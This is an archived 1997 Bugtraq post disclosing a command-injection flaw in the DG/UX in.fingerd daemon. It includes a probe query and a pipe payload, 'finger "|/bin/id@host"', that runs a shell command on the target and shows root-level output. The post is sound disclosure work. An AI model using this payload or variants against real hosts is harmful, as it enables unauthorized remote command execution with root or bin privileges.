[5143] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

dgux in.fingerd vulnerability

daemon@ATHENA.MIT.EDU (George Imburgia)
Tue Aug 12 01:21:45 1997

Date: 	Mon, 11 Aug 1997 12:32:38 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG

Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W@host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id@host"

Often, you will see something like this;

uid=0(root) gid=0(root)

or;

uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[5143] in bugtraq

dgux in.fingerd vulnerability

daemon@ATHENA.MIT.EDU (George Imburgia)Tue Aug 12 01:21:45 1997

daemon@ATHENA.MIT.EDU (George Imburgia)
Tue Aug 12 01:21:45 1997